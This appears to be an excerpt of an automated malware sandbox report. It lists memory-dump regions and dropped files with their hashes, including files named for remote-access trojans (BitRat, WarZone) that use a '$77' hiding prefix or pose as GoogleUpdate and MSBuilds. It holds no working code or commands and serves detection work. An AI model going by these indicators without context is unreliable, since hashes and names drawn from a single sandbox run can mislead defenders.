memory/3772-159-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3980-164-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.0.cs

MD5 b3a0e87506914a518a26de26cc397a0b
SHA1 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3
SHA256 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110
SHA512 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c

memory/4432-166-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline

MD5 f4e02ad531227dfde2db9e6da710c2a2
SHA1 5d4e598721c989be975022060a01eef1992da72d
SHA256 6c4827996d73b0188f15ce978098ec336daab436babc02fcf1c1ff284fbe25a7
SHA512 2ee6a97c948b631919a7ea65641755563b5aea426d574f166c8e1e1d7e9b07e706f9bb9898749afd8f8b9f4fbc9d100fb690ebdc6f54bcbf1511ba5747138440

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

MD5 f8169767c726f1be7a7e14839cc44d36
SHA1 571bcdb58a2017d77593ea1325bac737160b81f4
SHA256 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377
SHA512 c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

memory/4524-168-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP

MD5 8bbf0aca651a891e81c9323a8af372ee
SHA1 c6ff718e14da6eb73d2733b41c0a95df9a23fc45
SHA256 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2
SHA512 e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp

MD5 bdb285fbac36bb8dbf9bae08e3ca29f9
SHA1 e9f9876f8e153eebef538ec82f62ed1cad2828c6
SHA256 bf18a49ec16c2340aa77dde24e050173bb15854c4dc04fa3fc2ce7ee3a30ed1a
SHA512 e56e0e1a23915a7e4f87b61f143bd66bc479078b7505bed9e8e25f27a3872c9ff6e7defd5ec9902f243194214c205c9a606b0f263c29066534efb90bf151b052

memory/572-171-0x0000000000000000-mapping.dmp

memory/4260-173-0x000000000041F7B2-mapping.dmp

memory/4924-174-0x0000000006D60000-0x0000000006D92000-memory.dmp

memory/4852-175-0x0000000000000000-mapping.dmp

memory/4924-176-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

memory/4924-177-0x0000000006D40000-0x0000000006D5E000-memory.dmp

memory/4260-172-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4260-178-0x0000000004E30000-0x0000000004EC2000-memory.dmp

memory/4260-179-0x0000000005020000-0x00000000050BC000-memory.dmp

memory/4924-180-0x00000000080F0000-0x000000000876A000-memory.dmp

memory/4924-181-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

memory/4432-184-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp

C:\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

C:\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

memory/4924-188-0x0000000007B20000-0x0000000007B2A000-memory.dmp

memory/3772-189-0x000000006FEE0000-0x000000006FF19000-memory.dmp

memory/3560-185-0x0000000000000000-mapping.dmp

memory/3772-190-0x000000006F810000-0x000000006F849000-memory.dmp

memory/3160-191-0x0000000000000000-mapping.dmp

memory/2848-183-0x0000000000000000-mapping.dmp

memory/2264-182-0x0000000000000000-mapping.dmp

memory/2436-192-0x0000000000000000-mapping.dmp

memory/4924-193-0x0000000007D30000-0x0000000007DC6000-memory.dmp

memory/3860-195-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

MD5 1644f12dc1fdf3e3505fd85cc7ee2bfb
SHA1 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132
SHA256 a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7
SHA512 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

MD5 1644f12dc1fdf3e3505fd85cc7ee2bfb
SHA1 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132
SHA256 a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7
SHA512 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

memory/4668-198-0x0000000000C20000-0x0000000000C28000-memory.dmp

memory/4668-194-0x0000000000000000-mapping.dmp

memory/4668-199-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/3172-200-0x0000000000000000-mapping.dmp

memory/1436-201-0x0000000000000000-mapping.dmp

memory/4152-202-0x0000000000000000-mapping.dmp

memory/4444-204-0x0000000000000000-mapping.dmp

memory/1472-203-0x0000000000000000-mapping.dmp

memory/4924-205-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

memory/3772-206-0x000000006EA90000-0x000000006EAC9000-memory.dmp

memory/4924-207-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

memory/1472-208-0x0000000000910000-0x0000000000911000-memory.dmp

memory/4924-209-0x0000000007DD0000-0x0000000007DD8000-memory.dmp

memory/2264-210-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

memory/1436-218-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

memory/4668-220-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/1124-221-0x0000021DDF910000-0x0000021DDF930000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c9199f60a330471595859d6cdc0a6d
SHA1 eb9c797cb6f892c0a77b91ff6a6337f2ce958c24
SHA256 bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411
SHA512 421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14

memory/4924-228-0x0000000007E40000-0x0000000007E62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70f94f425bc3f24106790d4c7d46b792
SHA1 e86ac9ab83476e200dc92c3be9d7b9a6792bce9b
SHA256 9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c
SHA512 a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6347b5bfbd2371b20a3c0452e4030638
SHA1 ada85fe3166c6d12a8cf4358d944637aeeaad4ee
SHA256 02250982f5f910704a7c1bea8cf81bda3194dfa8aefccba1c650a72288e64ec4
SHA512 b98b4b6e9e2e0848a09b7b24ecd9fb58febcb52d04ba62eccac4ad645466c5aa550b4691b2db8fb2749d7887f30ec5a35fc64c94172f6fb896fc55ca0e86368a

memory/1124-231-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-232-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-233-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-234-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-235-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-237-0x0000021DDEB50000-0x0000021DDEC50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cd207fca512b968e839518ad19ec724c
SHA1 4b8ce07ccbaf935f8c6378ef49bef65158cd99ec
SHA256 80cf8c8c54d4c4625614e3db5d9a0c66cacd15565aba698aec303ca7e1c0405d
SHA512 271af571ae4dd0a090213d38538bfd2749248395a99ed8a1ec598a488cda27988d2e84e2ab7514e3a905957e36cdad69d9a7f27e15864abb7a4cc98b21f28ba3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4b2ed10cbd2d58dbbf3c50a155c3e34d
SHA1 aabe7337b4253830afdf97f24a71773c7c236c6e
SHA256 5cb15d10fcd38f7f09e0a496169f451bf403d356cff9ac026a22691134ce8d4a
SHA512 bd99e9dc58099d290cf7b4ed9a54038e254087459ec302b85a9dac517c10670cc383952284210c20ef4daa182bc4d8a85fcb86cd744df5e85657f120a3bb589a

memory/3772-240-0x000000006E8D0000-0x000000006E909000-memory.dmp

memory/4092-241-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/4092-242-0x0000017BC64C0000-0x0000017BC64E2000-memory.dmp

memory/3772-243-0x0000000070210000-0x0000000070249000-memory.dmp

memory/4092-244-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/3772-245-0x0000000070210000-0x0000000070249000-memory.dmp

memory/4092-246-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

memory/4092-247-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

memory/2504-249-0x0000000140002300-mapping.dmp

memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2504-251-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2504-252-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

memory/2504-253-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

memory/408-255-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

memory/620-254-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp